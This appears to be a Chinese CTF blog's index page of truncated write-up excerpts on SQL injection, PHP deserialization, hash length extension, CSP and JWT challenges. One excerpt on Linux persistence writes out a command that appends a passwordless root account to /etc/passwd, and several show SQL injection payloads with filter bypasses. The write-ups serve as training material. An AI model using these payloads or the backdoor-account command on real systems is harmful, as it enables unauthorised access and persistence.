网鼎杯-2018-Web-Unfinish
首先可以看到这是一个登陆框,感觉不太可能是这么简单的SQL注入,所以先扫扫目录再说
发现register.php页面用于注册账号,目测应该是一个二次注入的页面,也就是在注册页面构造好注入的语句然后在登录的时候返回信息
测试Mysql环境1select hex('test');
返回74657374
1select '0'+hex('test');
返回 74657374(注意前面有空格)
1select '0'+hex('test'...
Jarvis-PHPINFO源码+题目分析1234567891011121314151617181920212223242526<?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO{ public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'...
前置知识深入理解hash长度扩展攻击
Jarvis-flag在管理员手里只有admin才能看到flag
然后抓包看看
发现role,反序列化过来是s:5:”guest”;
尝试改成admin,不行….,加上这里有个hsh值,事情应该没那么简单
扫描目录发现index.php~,download到kali用vim -r恢复之后看到源码
解题这里需要用到hashpump工具,可以集成到python中使用
具体用法看p神hashpump
直接上脚本
123456789101112131415161718192021222324import requestsimport urllibfrom ...
Linux权限维持增加超级用户
增加无密码的超级用户
1echo "HackerQWQ:x:0:0::/:/bin/sh" >> /etc/passwd
增加有密码的超级用户
生成密码
12openssl passwd -6 -salt hub HackerQWQ# $6$hub$vRlpOJ/sXn8wYsP9FzjYyKt284QTJUmTI56MlQ6/9NIY/aXgy1MvB1elpoHEeApGpobTqgvt8c1FCfJuoULqa0
写入进/etc/pas...
转载自CSP总结及CTF实例分析
What is CSP?
The new Content-Security-Policy HTTP response header helps you reduce XSS risks on modern browsers by declaring what dynamic resources are allowed to load via a HTTP Header.
CSP(Content Security Policy) 在 HTTP 响应头中规定,用来减少 XSS 攻击。在 HTTP 响应中长这样
1Content-Security-Polic...
2019-强网杯supersqli
随便输入一下发现select等关键词被过滤
尝试绕过关键词,%0a、<\a>、十六进制,内联注释都不行
解法一前置知识:堆叠注入
显示列信息
show columns from table_name
desc table_name
select * from information_schema.columns where table_schema="" and table_name=""
使用;分隔命令,从而执行多个命令
payload:爆数据库
11'/**/and/**/extr...
BDJCTF-2020-Web-easy_searchindex.php
试了几个都弱口令都不行,看了看题目(easy_search),于是扫了扫目录,发现index.php.swp,down下来之后看到了源代码
12345678910111213141516171819202122232425262728293031<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst...
2020-网鼎杯-玄武组-js_on前置知识jwt(前面的博客已经提到过了),自行翻看
看题目先是一个登陆框
使用admin/admin登陆之后看到了jwt的key值
jwt结合sql注入解题先进行尝试
1admin'/**/and/**/1=1#
1admin'/**/and/**/1=2#
结果不一样,说明user存在注入点
经过尝试,发现select这些都被过滤了,使用进行绕过,构造出最终payload
1admin'/**/and/**/as<a>cii(m<a>id((se<a>lect/**/lo<...
HCTF-2018-Web-warmup来人,把朕的源码端上来:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748<?phphighlight_file(__FILE__);class emmm{ public static function checkFile(&$page) { $whitelist = ["source"=>"source.php",&q...
AreUSerialz源码:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename;...